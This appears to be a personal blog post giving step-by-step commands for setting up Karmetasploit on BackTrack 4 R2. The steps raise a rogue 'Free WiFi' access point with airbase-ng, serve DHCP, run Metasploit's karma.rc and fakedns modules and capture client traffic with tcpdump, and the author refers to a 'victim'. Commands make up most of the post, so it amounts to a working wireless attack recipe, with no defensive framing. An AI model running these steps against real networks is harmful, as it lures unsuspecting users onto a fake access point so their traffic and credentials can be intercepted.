Karmetasploit on BT4R2
Purpose
The purpose of this post is to provide quick guidance on getting Karmetasploit running on BT4R2 for my specific environment. These steps may work for you, but this post is intended, primarily, to document this so I can remember it later…
Background
Karmetasploit is a combination of Karma and Metaploit.
Resources Used
1: KARMA + Metasploit Framework 3 == Karmetasploit
2: Metasploit with MYSQL in BackTrack 4 r2
3: Karmetasploit Configuration
4a: Metasploit + Karma=Karmetasploit Part 1
4b: Metasploit + Karma=Karmetasploit Part 2
Prerequisites
- BT4R2 is installed
- Networking to the Internet is available (to update BT and MSF)
Update BackTrack and MSF
Update BT4R2
> /usr/bin/apt-get update
> /usr/bin/apt-get upgrade
Update MSF
> /opt/metasploit3/msf3/msfupdate
Configure
Metasploit Karma Configuration File
Download File
> /usr/bin/lynx -nolist -dump http://metasploit.com/users/hdm/tools/karma.rc > karma.rc
Edit File
Change the following lines as noted
load db_sqllite3 –> db_driver mysql
db_create /root/karma.db –> db_connect root:toor@localhost/karma
DHCP Configuration File
Edit File
Change the following config file as described in Resource 1.
/etc/dhcp3/dhcpd.conf
Reboot
Restart the host to reset the wireless network… This step may be necessary if you were using the wireless interface to perform the above activities.
Test Wireless Injection
> /usr/local/sbin/airmon-ng start wlan0
The above command creates interface mon0.
The next command tests packet injection on the interface. (Note, this is “DASH DASH test mon0″ - it may display as “DASH test mon0″ in your browser).
> /usr/local/sbin/aireplay-ng –test mon0
To stop the monitor interface
> /usr/local/sbin/airmon-ng stop mon0
Run
Start MySQL
> /etc/init.d/mysql start
Create Fake AP
If have not done so, place the wireless card in monitor mode using:
> /usr/local/sbin/airmon-ng start wlan0
Then execute the following commands:
> /usr/local/sbin/airbase-ng -P -C 30 -c 1 -e “Free WiFi” -v mon0
(The above command creates interface at0. We will use this as the end-point interface for clients connecting to our fake AP.)
Note: without the -c 1 option, my AP would NOT show up in the available networks list of my victim. I obtained the channel number by looking at the output of the –test. I compared the APs showing up in that list to those showing up on my victim, then using the same channel. Others have experienced this as noted in Kosis’s comment on CG’s blog post (Resource 4b).
> /sbin/ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
> /usr/sbin/dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
> /opt/metaploit3/msf3/msfconsole -r karma.rc
> /usr/sbin/tcpdump -w dump.pcap -i at0
Look at Progress
msf> db_notes
Consider: Blackhole Routing from the MSF paper
NOTES
Looks like fakedns crashes after some time. Appears to crash after first client connections. How to monitor?
The fakedns can be restarted as follows:
msf> use auxiliary/server/fakedns
msf> set SRVPORT 53
msf> run